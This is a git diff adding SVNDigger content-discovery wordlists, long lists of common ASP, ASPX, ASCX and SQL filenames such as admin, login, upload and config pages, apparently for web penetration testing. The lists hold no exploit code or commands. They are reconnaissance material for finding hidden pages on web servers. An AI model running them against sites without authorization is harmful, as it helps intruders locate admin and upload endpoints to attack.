langue.sql
|
||||||
|
profile.sql
|
||||||
|
mysql_demo.sql
|
||||||
|
convert_infopages_to_ezpages.sql
|
||||||
|
db_rebuild_autoincrement.sql
|
||||||
|
mysql_upgrade_zencart_1301_to_1302.sql
|
||||||
|
mysql_upgrade_zencart_1302_to_135.sql
|
||||||
|
mysql_upgrade_zencart_135_to_136.sql
|
||||||
|
mysql_upgrade_zencart_136_to_137.sql
|
||||||
|
mysql_upgrade_zencart_137_to_138.sql
|
||||||
|
mysql_zencart.sql
|
||||||
1334
Discovery/SVNDigger/cat/Database/xml.txt
Normal file
1334
Discovery/SVNDigger/cat/Database/xml.txt
Normal file
File diff suppressed because it is too large
Load Diff
80
Discovery/SVNDigger/cat/Language/ascx.txt
Normal file
80
Discovery/SVNDigger/cat/Language/ascx.txt
Normal file
@@ -0,0 +1,80 @@
|
|||||||
|
config.ascx
|
||||||
|
LogOnUserControl.ascx
|
||||||
|
LoginUserControl.ascx
|
||||||
|
Login.ascx
|
||||||
|
Menu.ascx
|
||||||
|
Register.ascx
|
||||||
|
Header.ascx
|
||||||
|
Footer.ascx
|
||||||
|
AdminMenu.ascx
|
||||||
|
Message.ascx
|
||||||
|
Search.ascx
|
||||||
|
CategoryList.ascx
|
||||||
|
ControlPanel.ascx
|
||||||
|
Bottom.ascx
|
||||||
|
Left.ascx
|
||||||
|
Top.ascx
|
||||||
|
CommentList.ascx
|
||||||
|
pager.ascx
|
||||||
|
Empty.ascx
|
||||||
|
FileManager.ascx
|
||||||
|
SearchInput.ascx
|
||||||
|
Signin.ascx
|
||||||
|
Address.ascx
|
||||||
|
TopMenu.ascx
|
||||||
|
tinyMCE.ascx
|
||||||
|
edit.ascx
|
||||||
|
Gallery.ascx
|
||||||
|
TagCloud.ascx
|
||||||
|
HeadMenu.ascx
|
||||||
|
propertyindex.ascx
|
||||||
|
LinkList.ascx
|
||||||
|
Text.ascx
|
||||||
|
Index.ascx
|
||||||
|
Form.ascx
|
||||||
|
AlbumList.ascx
|
||||||
|
UserInfo.ascx
|
||||||
|
404.ascx
|
||||||
|
DeleteSessionLink.ascx
|
||||||
|
DeleteSpeakerLink.ascx
|
||||||
|
DeleteTimeSlotLink.ascx
|
||||||
|
EditSessionLink.ascx
|
||||||
|
EditSpeakerLink.ascx
|
||||||
|
EditTimeSlotLink.ascx
|
||||||
|
EditTrackLink.ascx
|
||||||
|
http404.ascx
|
||||||
|
Password.ascx
|
||||||
|
OrderDetails.ascx
|
||||||
|
Actions.ascx
|
||||||
|
Title.ascx
|
||||||
|
HostSettings.ascx
|
||||||
|
Languages.ascx
|
||||||
|
SiteSettings.ascx
|
||||||
|
Roles.ascx
|
||||||
|
Banner.ascx
|
||||||
|
BreadCrumb.ascx
|
||||||
|
Help.ascx
|
||||||
|
Links.ascx
|
||||||
|
Users.ascx
|
||||||
|
Profile.ascx
|
||||||
|
Post.ascx
|
||||||
|
CommentView.ascx
|
||||||
|
PostList.ascx
|
||||||
|
Editor.ascx
|
||||||
|
Extensions.ascx
|
||||||
|
Settings.ascx
|
||||||
|
htmlEditor.ascx
|
||||||
|
PostView.ascx
|
||||||
|
widget.ascx
|
||||||
|
TopicView.ascx
|
||||||
|
Error.ascx
|
||||||
|
leftmenu.ascx
|
||||||
|
ContactForm.ascx
|
||||||
|
NewsList.ascx
|
||||||
|
Show.ascx
|
||||||
|
HelloWorld.ascx
|
||||||
|
test.ascx
|
||||||
|
forum.ascx
|
||||||
|
ServerSelectPanel.ascx
|
||||||
|
MainMenu.ascx
|
||||||
|
Sidebar.ascx
|
||||||
619
Discovery/SVNDigger/cat/Language/asp.txt
Normal file
619
Discovery/SVNDigger/cat/Language/asp.txt
Normal file
@@ -0,0 +1,619 @@
|
|||||||
|
config.asp
|
||||||
|
upload.asp
|
||||||
|
class_upload.asp
|
||||||
|
io.asp
|
||||||
|
util.asp
|
||||||
|
basexml.asp
|
||||||
|
commands.asp
|
||||||
|
connector.asp
|
||||||
|
fckeditor.asp
|
||||||
|
default.asp
|
||||||
|
index.asp
|
||||||
|
login.asp
|
||||||
|
sample01.asp
|
||||||
|
sample02.asp
|
||||||
|
sample03.asp
|
||||||
|
sample04.asp
|
||||||
|
sampleposteddata.asp
|
||||||
|
md5.asp
|
||||||
|
Conn.asp
|
||||||
|
logout.asp
|
||||||
|
admin.asp
|
||||||
|
search.asp
|
||||||
|
function.asp
|
||||||
|
test.asp
|
||||||
|
list.asp
|
||||||
|
user.asp
|
||||||
|
Template.asp
|
||||||
|
const.asp
|
||||||
|
news.asp
|
||||||
|
post.asp
|
||||||
|
view.asp
|
||||||
|
Help.asp
|
||||||
|
register.asp
|
||||||
|
main.asp
|
||||||
|
menu.asp
|
||||||
|
upfile.asp
|
||||||
|
left.asp
|
||||||
|
footer.asp
|
||||||
|
ubbcode.asp
|
||||||
|
code.asp
|
||||||
|
functions.asp
|
||||||
|
header.asp
|
||||||
|
common.asp
|
||||||
|
page.asp
|
||||||
|
del.asp
|
||||||
|
Email.asp
|
||||||
|
top.asp
|
||||||
|
edit.asp
|
||||||
|
Admin_Login.asp
|
||||||
|
xml.asp
|
||||||
|
Link.asp
|
||||||
|
article.asp
|
||||||
|
check.asp
|
||||||
|
checklogin.asp
|
||||||
|
head.asp
|
||||||
|
userinfo.asp
|
||||||
|
save.asp
|
||||||
|
admin_admin.asp
|
||||||
|
reg.asp
|
||||||
|
date.asp
|
||||||
|
Setting.asp
|
||||||
|
show.asp
|
||||||
|
about.asp
|
||||||
|
inc.asp
|
||||||
|
ChkLogin.asp
|
||||||
|
ShowImg.asp
|
||||||
|
userlist.asp
|
||||||
|
copyright.asp
|
||||||
|
right.asp
|
||||||
|
welcome.asp
|
||||||
|
reply.asp
|
||||||
|
contact.asp
|
||||||
|
Global.asp
|
||||||
|
query.asp
|
||||||
|
gonggao.asp
|
||||||
|
setup.asp
|
||||||
|
db.asp
|
||||||
|
base64.asp
|
||||||
|
string.asp
|
||||||
|
Data.asp
|
||||||
|
Message.asp
|
||||||
|
sitemap.asp
|
||||||
|
checkcode.asp
|
||||||
|
control.asp
|
||||||
|
sha1.asp
|
||||||
|
cache.asp
|
||||||
|
action.asp
|
||||||
|
add.asp
|
||||||
|
Profile.asp
|
||||||
|
Foot.asp
|
||||||
|
ConnNews.asp
|
||||||
|
ConnProdu.asp
|
||||||
|
Exit.asp
|
||||||
|
admin_left.asp
|
||||||
|
admin_user.asp
|
||||||
|
sql.asp
|
||||||
|
Admin_list.asp
|
||||||
|
sysset.asp
|
||||||
|
saveadmin.asp
|
||||||
|
func.asp
|
||||||
|
admin_config.asp
|
||||||
|
admin_news.asp
|
||||||
|
ubb.asp
|
||||||
|
product.asp
|
||||||
|
aspcheck.asp
|
||||||
|
online.asp
|
||||||
|
FreeASPUpload.asp
|
||||||
|
delete.asp
|
||||||
|
img.asp
|
||||||
|
asptemplate.asp
|
||||||
|
upload_5xsoft.asp
|
||||||
|
connection.asp
|
||||||
|
en.asp
|
||||||
|
System.asp
|
||||||
|
inc_config.asp
|
||||||
|
install.asp
|
||||||
|
clsUpload.asp
|
||||||
|
core.asp
|
||||||
|
settings.asp
|
||||||
|
Update.asp
|
||||||
|
Cls_Main.asp
|
||||||
|
preview.asp
|
||||||
|
GetCode.asp
|
||||||
|
Admin_UploadFile.asp
|
||||||
|
insert.asp
|
||||||
|
get.asp
|
||||||
|
blank.asp
|
||||||
|
JSON.asp
|
||||||
|
class.asp
|
||||||
|
file.asp
|
||||||
|
session.asp
|
||||||
|
stat.asp
|
||||||
|
PopUp.asp
|
||||||
|
rss.asp
|
||||||
|
404.asp
|
||||||
|
scode.asp
|
||||||
|
links.asp
|
||||||
|
category.asp
|
||||||
|
Status.asp
|
||||||
|
chat.asp
|
||||||
|
private.asp
|
||||||
|
example.asp
|
||||||
|
AdAdmin.asp
|
||||||
|
Adadmin_Save.asp
|
||||||
|
ConnBook.asp
|
||||||
|
ConnDB.asp
|
||||||
|
ConnJobs.asp
|
||||||
|
ConnNew.asp
|
||||||
|
ConnOther.asp
|
||||||
|
Conntaolun.asp
|
||||||
|
Connwl.asp
|
||||||
|
File_Admin_AddNew.asp
|
||||||
|
File_Admin_List.asp
|
||||||
|
File_Admin_Modify.asp
|
||||||
|
File_Admin_Modify_save.asp
|
||||||
|
File_Admin_News_Del.asp
|
||||||
|
JobAdmin.asp
|
||||||
|
JobsAdmin_AboutUs.asp
|
||||||
|
JobsAdmin_AboutUs_Save.asp
|
||||||
|
JobsAdmin_Job.asp
|
||||||
|
JobsAdmin_Job_Del.asp
|
||||||
|
JobsAdmin_Job_Modify.asp
|
||||||
|
JobsAdmin_Job_Publish.asp
|
||||||
|
JobsAdmin_Job_Save.asp
|
||||||
|
JobsAdmin_Job_Update.asp
|
||||||
|
JobsAdmin_Person.asp
|
||||||
|
JobsAdmin_Person_Del.asp
|
||||||
|
JobsAdmin_Person_Info.asp
|
||||||
|
NewAdmin_Modify.asp
|
||||||
|
NewAdmin_Modify_Save.asp
|
||||||
|
NewAdmin_New_Del.asp
|
||||||
|
NewsAdmin.asp
|
||||||
|
NewsAdmin_AddNew.asp
|
||||||
|
NewsAdmin_AddNew_Save.asp
|
||||||
|
NewsAdmin_AddType.asp
|
||||||
|
NewsAdmin_DelType.asp
|
||||||
|
NewsAdmin_Home.asp
|
||||||
|
NewsAdmin_HomeAdd.asp
|
||||||
|
NewsAdmin_HomeAdd_Save.asp
|
||||||
|
NewsAdmin_HomeModify_Save.asp
|
||||||
|
NewsAdmin_Home_Doing.asp
|
||||||
|
NewsAdmin_Home_Modify.asp
|
||||||
|
NewsAdmin_Home_Pic.asp
|
||||||
|
NewsAdmin_List.asp
|
||||||
|
NewsAdmin_Modify.asp
|
||||||
|
NewsAdmin_Modify1.asp
|
||||||
|
NewsAdmin_Modify_Save.asp
|
||||||
|
NewsAdmin_News_Del.asp
|
||||||
|
NewsAdmin_Type.asp
|
||||||
|
OtherAdmin.asp
|
||||||
|
PasswordAdmin.asp
|
||||||
|
Passwordadmin_Save.asp
|
||||||
|
PollAdmin.asp
|
||||||
|
PollAdmin_add.asp
|
||||||
|
PollAdmin_admin.asp
|
||||||
|
PollAdmin_delete.asp
|
||||||
|
PollAdmin_display.asp
|
||||||
|
ProduAdmin.asp
|
||||||
|
ProduAdmin_AddProdu.asp
|
||||||
|
ProduAdmin_AddType.asp
|
||||||
|
ProduAdmin_Addpinpai.asp
|
||||||
|
ProduAdmin_DelOrder.asp
|
||||||
|
ProduAdmin_DelProdu.asp
|
||||||
|
ProduAdmin_DelType.asp
|
||||||
|
ProduAdmin_Delpinpai.asp
|
||||||
|
ProduAdmin_Modify_Save.asp
|
||||||
|
ProduAdmin_NewProdu.asp
|
||||||
|
ProduAdmin_Order.asp
|
||||||
|
ProduAdmin_Order_See.asp
|
||||||
|
ProduAdmin_PubProdu.asp
|
||||||
|
ProduAdmin_Type.asp
|
||||||
|
ProduAdmin_childSave.asp
|
||||||
|
ProduAdmin_childpinpai.asp
|
||||||
|
ProduAdmin_childpinpaiSave.asp
|
||||||
|
ProduAdmin_childtype.asp
|
||||||
|
ProduAdmin_daType.asp
|
||||||
|
ProduAdmin_pinpai.asp
|
||||||
|
ProduAdmin_xiaoType.asp
|
||||||
|
PubAdmin.asp
|
||||||
|
Pubadmin_Save.asp
|
||||||
|
SayAdmin.asp
|
||||||
|
SayAdmin_Del.asp
|
||||||
|
ShowHeadPic.asp
|
||||||
|
ShowNewsPic.asp
|
||||||
|
ShowNewsPic1.asp
|
||||||
|
ShowProduPic.asp
|
||||||
|
ShowcontentPic.asp
|
||||||
|
ShowpinpaiPic.asp
|
||||||
|
ShowpinpaiPic1.asp
|
||||||
|
ShowyingpinPic.asp
|
||||||
|
Top_admin.asp
|
||||||
|
UpImg.asp
|
||||||
|
addfile.asp
|
||||||
|
admin_flash.asp
|
||||||
|
admin_flashdel.asp
|
||||||
|
admin_flashedit.asp
|
||||||
|
admin_upfile.asp
|
||||||
|
admin_upload.asp
|
||||||
|
char.asp
|
||||||
|
user_shenhe.asp
|
||||||
|
conn1.asp
|
||||||
|
vote_function.asp
|
||||||
|
Add_Vote.asp
|
||||||
|
Mod_Vote.asp
|
||||||
|
Mod_admin.asp
|
||||||
|
Vote_List.asp
|
||||||
|
admin_save.asp
|
||||||
|
delvote.asp
|
||||||
|
vote_save.asp
|
||||||
|
vote_showcode.asp
|
||||||
|
??? Admin_list.asp
|
||||||
|
??? Vote_List.asp
|
||||||
|
out.asp
|
||||||
|
countvote.asp
|
||||||
|
showall.asp
|
||||||
|
showvote.asp
|
||||||
|
showvote111.asp
|
||||||
|
showvotedetails1.asp
|
||||||
|
dir.inc.asp
|
||||||
|
down.asp
|
||||||
|
dzbl_List.asp
|
||||||
|
dzbl_del.asp
|
||||||
|
eokedit.asp
|
||||||
|
eokedit1.asp
|
||||||
|
file_add_db.asp
|
||||||
|
flash_play.asp
|
||||||
|
gdAdmin.asp
|
||||||
|
gdadmin_Save.asp
|
||||||
|
gywm_Modify.asp
|
||||||
|
gywm_Modify_Save.asp
|
||||||
|
email_word.asp
|
||||||
|
upload_5xsoft.inc.asp
|
||||||
|
liuyan_Del.asp
|
||||||
|
liuyan_Del_en.asp
|
||||||
|
liuyan_List.asp
|
||||||
|
liuyan_List_en.asp
|
||||||
|
liuyan_show.asp
|
||||||
|
liuyan_show_en.asp
|
||||||
|
mmAdmin.asp
|
||||||
|
modifypic.asp
|
||||||
|
modifypic_news.asp
|
||||||
|
modifypic_produ.asp
|
||||||
|
modifyprodupic.asp
|
||||||
|
newadmin.asp
|
||||||
|
newadmin_addnew.asp
|
||||||
|
newadmin_addnew_save.asp
|
||||||
|
newadmin_list.asp
|
||||||
|
pic_List.asp
|
||||||
|
pic_List1.asp
|
||||||
|
selimage.asp
|
||||||
|
produAdmin_AddNew.asp
|
||||||
|
produAdmin_AddNew_Save.asp
|
||||||
|
produAdmin_List.asp
|
||||||
|
produAdmin_Modify.asp
|
||||||
|
produAdmin_News_Del.asp
|
||||||
|
shangchuan.asp
|
||||||
|
sysuser.asp
|
||||||
|
textbox.asp
|
||||||
|
textbox_jj.asp
|
||||||
|
textbox_news.asp
|
||||||
|
textbox_produ.asp
|
||||||
|
top1.asp
|
||||||
|
bottom.asp
|
||||||
|
daima.asp
|
||||||
|
savevote.asp
|
||||||
|
step1.asp
|
||||||
|
votedy.asp
|
||||||
|
votelist.asp
|
||||||
|
votetou.asp
|
||||||
|
xg.asp
|
||||||
|
xgadmin.asp
|
||||||
|
upfile_lx.asp
|
||||||
|
upfile_xx.asp
|
||||||
|
upload_lx.asp
|
||||||
|
upload_xx.asp
|
||||||
|
wzgg_Modify.asp
|
||||||
|
wzgg_Modify_Save.asp
|
||||||
|
announce.asp
|
||||||
|
result.asp
|
||||||
|
admin_art.asp
|
||||||
|
admin_canmou.asp
|
||||||
|
admin_cgglzn.asp
|
||||||
|
admin_chengguo.asp
|
||||||
|
admin_cmzz.asp
|
||||||
|
admin_copyright.asp
|
||||||
|
admin_diary.asp
|
||||||
|
admin_dj.asp
|
||||||
|
admin_down.asp
|
||||||
|
admin_duiwu.asp
|
||||||
|
admin_gonggao.asp
|
||||||
|
admin_jhdown.asp
|
||||||
|
admin_jhglzn.asp
|
||||||
|
admin_jiaoxue.asp
|
||||||
|
admin_jihua.asp
|
||||||
|
admin_js.asp
|
||||||
|
admin_keji.asp
|
||||||
|
admin_link.asp
|
||||||
|
admin_neibu.asp
|
||||||
|
admin_other.asp
|
||||||
|
admin_pic.asp
|
||||||
|
admin_view.asp
|
||||||
|
admin_viewok.asp
|
||||||
|
admin_vote.asp
|
||||||
|
admin_web.asp
|
||||||
|
admin_weiyuanhui.asp
|
||||||
|
admin_xiangmu.asp
|
||||||
|
admin_xmglzn.asp
|
||||||
|
admin_xsglzn.asp
|
||||||
|
admin_xuebao.asp
|
||||||
|
admin_xueshu.asp
|
||||||
|
admin_zhengzhi.asp
|
||||||
|
admin_zhidu.asp
|
||||||
|
admin_zhiliang.asp
|
||||||
|
admin_zlglzn.asp
|
||||||
|
bmjj.asp
|
||||||
|
cggl.asp
|
||||||
|
cgglzn.asp
|
||||||
|
glml.asp
|
||||||
|
glzn.asp
|
||||||
|
wdxz.asp
|
||||||
|
downloadlist.asp
|
||||||
|
duiwu.asp
|
||||||
|
ggnews.asp
|
||||||
|
imgnews.asp
|
||||||
|
FORMAT.asp
|
||||||
|
indexnew.asp
|
||||||
|
lyCode.asp
|
||||||
|
ubbshow.asp
|
||||||
|
viewsavebody.asp
|
||||||
|
index1.asp
|
||||||
|
insidelist.asp
|
||||||
|
insidenews.asp
|
||||||
|
jgjs.asp
|
||||||
|
glxz.asp
|
||||||
|
jhgl.asp
|
||||||
|
jhglzn.asp
|
||||||
|
jxnews.asp
|
||||||
|
jxpj.asp
|
||||||
|
liwei.asp
|
||||||
|
mdb.asp
|
||||||
|
left1.asp
|
||||||
|
left2.asp
|
||||||
|
left3.asp
|
||||||
|
left4.asp
|
||||||
|
left5.asp
|
||||||
|
soft.asp
|
||||||
|
techlist.asp
|
||||||
|
technews.asp
|
||||||
|
newsshow.asp
|
||||||
|
xbgl.asp
|
||||||
|
xbnews.asp
|
||||||
|
xmgl.asp
|
||||||
|
xmglzn.asp
|
||||||
|
xsgl.asp
|
||||||
|
xsglzn.asp
|
||||||
|
xsnews.asp
|
||||||
|
xswyh.asp
|
||||||
|
zhengzhi.asp
|
||||||
|
zhidu.asp
|
||||||
|
zlgl.asp
|
||||||
|
zlglzn.asp
|
||||||
|
error.asp
|
||||||
|
errors.asp
|
||||||
|
uploader.asp
|
||||||
|
easp.asp
|
||||||
|
jsonParser.asp
|
||||||
|
jsonRpcServer.asp
|
||||||
|
debug.asp
|
||||||
|
array.asp
|
||||||
|
utf8.asp
|
||||||
|
oracle.asp
|
||||||
|
document.asp
|
||||||
|
flash.asp
|
||||||
|
form.asp
|
||||||
|
Init.asp
|
||||||
|
inc_connection.asp
|
||||||
|
inc_language.asp
|
||||||
|
inc_header.asp
|
||||||
|
inc_ilanlar.asp
|
||||||
|
calendar.asp
|
||||||
|
export.asp
|
||||||
|
track.asp
|
||||||
|
AccessTopic.asp
|
||||||
|
Boardhelp.asp
|
||||||
|
Boke.asp
|
||||||
|
BokeAdmin.asp
|
||||||
|
BokeApply.asp
|
||||||
|
BokeDescription.asp
|
||||||
|
BokeIndex.asp
|
||||||
|
BokeManage.asp
|
||||||
|
BokeRss.asp
|
||||||
|
BokeSearch.asp
|
||||||
|
BokeUpload.asp
|
||||||
|
Bokepostings.asp
|
||||||
|
BuyPost.asp
|
||||||
|
Dv_GetCode.asp
|
||||||
|
Dv_News.asp
|
||||||
|
Dv_NewsView.asp
|
||||||
|
Dv_News_Demo.asp
|
||||||
|
DrawMagicFace.asp
|
||||||
|
plus_MagicFace_const.asp
|
||||||
|
plus_Tools_const.asp
|
||||||
|
GetChallengeWord.asp
|
||||||
|
InfoList.asp
|
||||||
|
JoinVipGroup.asp
|
||||||
|
Loadservoces.asp
|
||||||
|
Myplus.asp
|
||||||
|
Query_get.asp
|
||||||
|
RssFeed.asp
|
||||||
|
TopicOther.asp
|
||||||
|
UserPay.asp
|
||||||
|
ViewInfo.asp
|
||||||
|
Address.asp
|
||||||
|
AllDel.asp
|
||||||
|
BadWord.asp
|
||||||
|
BbsFace.asp
|
||||||
|
Board.asp
|
||||||
|
BoardSetting.asp
|
||||||
|
BoardUnite.asp
|
||||||
|
Challenge.asp
|
||||||
|
ForumAds.asp
|
||||||
|
ForumNewsSetting.asp
|
||||||
|
ForumPay.asp
|
||||||
|
Group.asp
|
||||||
|
Label.asp
|
||||||
|
LockIP.asp
|
||||||
|
Log.asp
|
||||||
|
MoneyLog.asp
|
||||||
|
Plus.asp
|
||||||
|
Plus_Tools_Info.asp
|
||||||
|
Plus_Tools_Magicface.asp
|
||||||
|
Plus_Tools_User.asp
|
||||||
|
PostData.asp
|
||||||
|
ReloadForumCache.asp
|
||||||
|
SendEmail.asp
|
||||||
|
UpLoadList.asp
|
||||||
|
UpUserFace.asp
|
||||||
|
Update_User.asp
|
||||||
|
Wealth.asp
|
||||||
|
myspace.asp
|
||||||
|
admin_batch.asp
|
||||||
|
admin_boardset.asp
|
||||||
|
admin_lockuser.asp
|
||||||
|
admin_postings.asp
|
||||||
|
announcements.asp
|
||||||
|
boardpermission.asp
|
||||||
|
boardstat.asp
|
||||||
|
CheckInput.asp
|
||||||
|
Cls_System.asp
|
||||||
|
PostCls.asp
|
||||||
|
Upload_Class.asp
|
||||||
|
cookies.asp
|
||||||
|
dispbbs.asp
|
||||||
|
dispuser.asp
|
||||||
|
Api_Config.asp
|
||||||
|
Cls_DvApi.asp
|
||||||
|
dv_dpo.asp
|
||||||
|
favlist.asp
|
||||||
|
fileshow.asp
|
||||||
|
friendlist.asp
|
||||||
|
helpview.asp
|
||||||
|
Chan_Const.asp
|
||||||
|
Dv_ClsMain.asp
|
||||||
|
Dv_ClsOther.asp
|
||||||
|
Dv_ubbcode.asp
|
||||||
|
Email_Cls.asp
|
||||||
|
GroupPermission.asp
|
||||||
|
Ubblist.asp
|
||||||
|
chkinput.asp
|
||||||
|
myadmin.asp
|
||||||
|
plus_check.asp
|
||||||
|
loadtree.asp
|
||||||
|
loadtree1.asp
|
||||||
|
lostpass.asp
|
||||||
|
messanger.asp
|
||||||
|
modifyadd.asp
|
||||||
|
myfile.asp
|
||||||
|
mymodify.asp
|
||||||
|
newpass.asp
|
||||||
|
passport.asp
|
||||||
|
pay_boardlimited.asp
|
||||||
|
plus_Tools_Center.asp
|
||||||
|
plus_Tools_InfoSetting.asp
|
||||||
|
plus_Tools_Magiclist.asp
|
||||||
|
plus_Tools_pay.asp
|
||||||
|
plus_Tools_postings.asp
|
||||||
|
post_upload.asp
|
||||||
|
recycle.asp
|
||||||
|
reg_upload.asp
|
||||||
|
savepost.asp
|
||||||
|
showerr.asp
|
||||||
|
smiley.asp
|
||||||
|
templates_view.asp
|
||||||
|
usermanager.asp
|
||||||
|
userregmanager.asp
|
||||||
|
usersms.asp
|
||||||
|
viewfile.asp
|
||||||
|
item.asp
|
||||||
|
Info.asp
|
||||||
|
grade.asp
|
||||||
|
sendmail.asp
|
||||||
|
JSON_2.0.2.asp
|
||||||
|
JSON_UTIL_0.1.1.asp
|
||||||
|
utf-8.asp
|
||||||
|
demo.asp
|
||||||
|
interface.asp
|
||||||
|
comment.asp
|
||||||
|
AdminMenu.asp
|
||||||
|
ChangePassword.asp
|
||||||
|
ClearCache.asp
|
||||||
|
Reset.asp
|
||||||
|
add_user.asp
|
||||||
|
del_user.asp
|
||||||
|
edit_user.asp
|
||||||
|
manage_user.asp
|
||||||
|
change_pass.asp
|
||||||
|
pic.asp
|
||||||
|
pinyin.asp
|
||||||
|
include.asp
|
||||||
|
Captcha.asp
|
||||||
|
aboutme.asp
|
||||||
|
Admin_Decode.asp
|
||||||
|
Admin_Default.asp
|
||||||
|
Admin_ModiPwd.asp
|
||||||
|
Admin_Private.asp
|
||||||
|
Admin_Style.asp
|
||||||
|
DeCode.asp
|
||||||
|
Startup.asp
|
||||||
|
upfile_class.asp
|
||||||
|
eWebEditor.asp
|
||||||
|
friend.asp
|
||||||
|
gbook.asp
|
||||||
|
music.asp
|
||||||
|
tags.asp
|
||||||
|
base.asp
|
||||||
|
manage.asp
|
||||||
|
doc_add.asp
|
||||||
|
monitor.asp
|
||||||
|
user_info.asp
|
||||||
|
forgot_password.asp
|
||||||
|
language.asp
|
||||||
|
topic.asp
|
||||||
|
member.asp
|
||||||
|
_common.asp
|
||||||
|
Record.asp
|
||||||
|
cls_article.asp
|
||||||
|
CategoryDAO.asp
|
||||||
|
articles.asp
|
||||||
|
Admin_Menu.asp
|
||||||
|
Version.asp
|
||||||
|
feed.asp
|
||||||
|
tag.asp
|
||||||
|
addnews.asp
|
||||||
|
add2.asp
|
||||||
|
voteadd.asp
|
||||||
|
votedel.asp
|
||||||
|
votemodify.asp
|
||||||
|
votesave.asp
|
||||||
|
wap.asp
|
||||||
|
Receive.asp
|
||||||
|
Send.asp
|
||||||
|
service.asp
|
||||||
|
vote.asp
|
||||||
|
Keywords.asp
|
||||||
|
CSS.asp
|
||||||
|
Job.asp
|
||||||
|
guestbook.asp
|
||||||
|
location.asp
|
||||||
|
movebloc.asp
|
||||||
|
basics.asp
|
||||||
|
images.asp
|
||||||
|
math.asp
|
||||||
|
fpdf.asp
|
||||||
|
activate.asp
|
||||||
|
stats.asp
|
||||||
|
download.asp
|
||||||
|
administrador.asp
|
||||||
|
Atendimento.asp
|
||||||
|
LogOff.asp
|
||||||
233
Discovery/SVNDigger/cat/Language/aspx.txt
Normal file
233
Discovery/SVNDigger/cat/Language/aspx.txt
Normal file
@@ -0,0 +1,233 @@
|
|||||||
|
Error.aspx
|
||||||
|
Login.aspx
|
||||||
|
Default.aspx
|
||||||
|
Register.aspx
|
||||||
|
Index.aspx
|
||||||
|
About.aspx
|
||||||
|
connector.aspx
|
||||||
|
upload.aspx
|
||||||
|
ChangePassword.aspx
|
||||||
|
ChangePasswordSuccess.aspx
|
||||||
|
Edit.aspx
|
||||||
|
LogOn.aspx
|
||||||
|
Logout.aspx
|
||||||
|
List.aspx
|
||||||
|
Create.aspx
|
||||||
|
Details.aspx
|
||||||
|
Users.aspx
|
||||||
|
Show.aspx
|
||||||
|
Search.aspx
|
||||||
|
Contact.aspx
|
||||||
|
Delete.aspx
|
||||||
|
test.aspx
|
||||||
|
Category.aspx
|
||||||
|
Home.aspx
|
||||||
|
View.aspx
|
||||||
|
Profile.aspx
|
||||||
|
New.aspx
|
||||||
|
Help.aspx
|
||||||
|
Categories.aspx
|
||||||
|
Settings.aspx
|
||||||
|
bookInfo.aspx
|
||||||
|
News.aspx
|
||||||
|
admin.aspx
|
||||||
|
Default2.aspx
|
||||||
|
NotFound.aspx
|
||||||
|
Registration.aspx
|
||||||
|
Post.aspx
|
||||||
|
Pages.aspx
|
||||||
|
Dashboard.aspx
|
||||||
|
Menu.aspx
|
||||||
|
ErrorPage.aspx
|
||||||
|
Product.aspx
|
||||||
|
ResetPassword.aspx
|
||||||
|
Main.aspx
|
||||||
|
Navigation.aspx
|
||||||
|
ShoppingCart.aspx
|
||||||
|
SiteMap.aspx
|
||||||
|
EditProfile.aspx
|
||||||
|
download.aspx
|
||||||
|
Account.aspx
|
||||||
|
StudentResult.aspx
|
||||||
|
shopping_cart.aspx
|
||||||
|
EditUser.aspx
|
||||||
|
UserProfile.aspx
|
||||||
|
Confirm.aspx
|
||||||
|
Statistics.aspx
|
||||||
|
RSS.aspx
|
||||||
|
Friends.aspx
|
||||||
|
Setup.aspx
|
||||||
|
Add.aspx
|
||||||
|
BookItemsAdmin.aspx
|
||||||
|
Item.aspx
|
||||||
|
CreateAccount.aspx
|
||||||
|
UserRoles.aspx
|
||||||
|
orderDetail.aspx
|
||||||
|
Detail.aspx
|
||||||
|
Orders.aspx
|
||||||
|
SignIn.aspx
|
||||||
|
Form.aspx
|
||||||
|
ftb.imagegallery.aspx
|
||||||
|
Gallery.aspx
|
||||||
|
Save.aspx
|
||||||
|
ManageUsers.aspx
|
||||||
|
AccessDenied.aspx
|
||||||
|
Bugs.aspx
|
||||||
|
Send.aspx
|
||||||
|
Projects.aspx
|
||||||
|
Tasks.aspx
|
||||||
|
ChangePwd.aspx
|
||||||
|
EditImage.aspx
|
||||||
|
Links.aspx
|
||||||
|
Logoff.aspx
|
||||||
|
Checkout.aspx
|
||||||
|
Start.aspx
|
||||||
|
Tables.aspx
|
||||||
|
ForgotPassword.aspx
|
||||||
|
Page.aspx
|
||||||
|
Profiles.aspx
|
||||||
|
referrers.aspx
|
||||||
|
history.aspx
|
||||||
|
Jobs.aspx
|
||||||
|
Mail.aspx
|
||||||
|
CategoryAdmin.aspx
|
||||||
|
adminLogin.aspx
|
||||||
|
Comments.aspx
|
||||||
|
Site.aspx
|
||||||
|
UpLoadFile.aspx
|
||||||
|
Preferences.aspx
|
||||||
|
sample.aspx
|
||||||
|
404.aspx
|
||||||
|
Comment.aspx
|
||||||
|
Tag.aspx
|
||||||
|
Top.aspx
|
||||||
|
Message.aspx
|
||||||
|
FAQ.aspx
|
||||||
|
Catalog.aspx
|
||||||
|
Order.aspx
|
||||||
|
ContactUs.aspx
|
||||||
|
UploadProperty.aspx
|
||||||
|
OrderDetails.aspx
|
||||||
|
userManage.aspx
|
||||||
|
Update.aspx
|
||||||
|
Book_info.aspx
|
||||||
|
StudyResult.aspx
|
||||||
|
TestValidatonControls.aspx
|
||||||
|
recherche.aspx
|
||||||
|
Security.aspx
|
||||||
|
products.aspx
|
||||||
|
Items.aspx
|
||||||
|
ErrorsGridView.aspx
|
||||||
|
ErrorsRssView.aspx
|
||||||
|
Messages.aspx
|
||||||
|
ThankYou.aspx
|
||||||
|
Display.aspx
|
||||||
|
Content.aspx
|
||||||
|
Editor.aspx
|
||||||
|
Reports.aspx
|
||||||
|
Move.aspx
|
||||||
|
EditVersion.aspx
|
||||||
|
Groups.aspx
|
||||||
|
Reserve.aspx
|
||||||
|
Confirmation.aspx
|
||||||
|
Vote.aspx
|
||||||
|
ScheduleSlot.aspx
|
||||||
|
SiteSettingsEdit.aspx
|
||||||
|
SiteSettingsList.aspx
|
||||||
|
UserRoleEdit.aspx
|
||||||
|
UserRoleList.aspx
|
||||||
|
SearchResults.aspx
|
||||||
|
OrderList.aspx
|
||||||
|
AddUser.aspx
|
||||||
|
install.aspx
|
||||||
|
KeepAlive.aspx
|
||||||
|
Shipping.aspx
|
||||||
|
Inscription.aspx
|
||||||
|
Room.aspx
|
||||||
|
Redirect.aspx
|
||||||
|
ViewAll.aspx
|
||||||
|
NotAuthorised.aspx
|
||||||
|
